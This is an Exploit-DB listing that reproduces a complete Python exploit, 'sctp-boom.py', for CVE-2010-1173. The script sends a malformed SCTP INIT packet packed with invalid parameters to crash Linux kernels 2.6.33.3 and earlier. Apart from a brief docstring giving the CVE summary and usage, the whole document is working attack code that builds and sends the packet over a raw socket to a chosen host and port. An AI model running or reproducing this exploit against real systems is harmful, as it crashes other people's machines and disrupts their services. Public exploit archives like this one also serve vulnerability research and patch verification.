Linux Kernel 2.6.33.3 - SCTP INIT Remote Denial of Service

EDB-ID:

14594


Platform:

Linux

Published:

2010-08-09

# From: http://jon.oberheide.org/files/sctp-boom.py
#!/usr/bin/env python

''' 
  sctp-boom.py
 
  Linux Kernel <= 2.6.33.3 SCTP INIT Remote DoS
  Jon Oberheide <jon@oberheide.org>
  http://jon.oberheide.org
  
  Information:
 
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1173

    The sctp_process_unk_param function in net/sctp/sm_make_chunk.c in the
    Linux kernel 2.6.33.3 and earlier, when SCTP is enabled, allows remote 
    attackers to cause a denial of service (system crash) via an SCTPChunkInit
    packet containing multiple invalid parameters that require a large amount 
    of error data. 

  Usage:
 
    $ python sctp-boom.py 1.2.3.4 19000
    [+] sending malformed SCTP INIT msg to 1.2.3.4:19000
    ...
    [+] kernel should have panicked on remote host 1.2.3.4

  Requirements:
    
    * dnet: http://libdnet.sourceforge.net/
    * dpkt: http://code.google.com/p/dpkt/

''' 

import os, sys, socket

def err(txt):
    print '[-] error: %s' % txt
    sys.exit(1)

def msg(txt):
    print '[+] %s' % txt

def usage():
    print >> sys.stderr, 'usage: %s host port' % sys.argv[0]
    sys.exit(1)

try:
    import dpkt
except ImportError:
    err('requires dpkt library: http://code.google.com/p/dpkt/')

try:
    import dnet
except ImportError:
    try:
        import dumbnet as dnet
    except ImportError:
        err('requires dnet library: http://libdnet.sourceforge.net/')

def main():
    if len(sys.argv) != 3:
        usage()

    host = sys.argv[1]
    port = int(sys.argv[2])

    try:
        sock = dnet.ip()
        intf = dnet.intf()
    except OSError:
        err('requires root privileges for raw socket access')

    dst_addr = socket.gethostbyname(host)
    interface = intf.get_dst(dnet.addr(dst_addr))
    src_addr = interface['addr'].ip

    msg('sending malformed SCTP INIT msg to %s:%s' % (dst_addr, port))

    invalid = ''
    invalid += '\x20\x10\x11\x73'
    invalid += '\x00\x00\xf4\x00'
    invalid += '\x00\x05'
    invalid += '\x00\x05'
    invalid += '\x20\x10\x11\x73'

    for i in xrange(20):
        invalid += '\xc0\xff\x00\x08\xff\xff\xff\xff'

    init = dpkt.sctp.Chunk()
    init.type = dpkt.sctp.INIT
    init.data = invalid
    init.len = len(init)

    sctp = dpkt.sctp.SCTP()
    sctp.sport = 0x1173
    sctp.dport = port
    sctp.data = [ init ]

    ip = dpkt.ip.IP()
    ip.src = src_addr
    ip.dst = dnet.ip_aton(dst_addr)
    ip.p = dpkt.ip.IP_PROTO_SCTP
    ip.data = sctp
    ip.len = len(ip)

    print `ip`

    pkt = dnet.ip_checksum(str(ip))
    sock.send(pkt)

    msg('kernel should have panicked on remote host %s' % (dst_addr))

if __name__ == '__main__':
    main()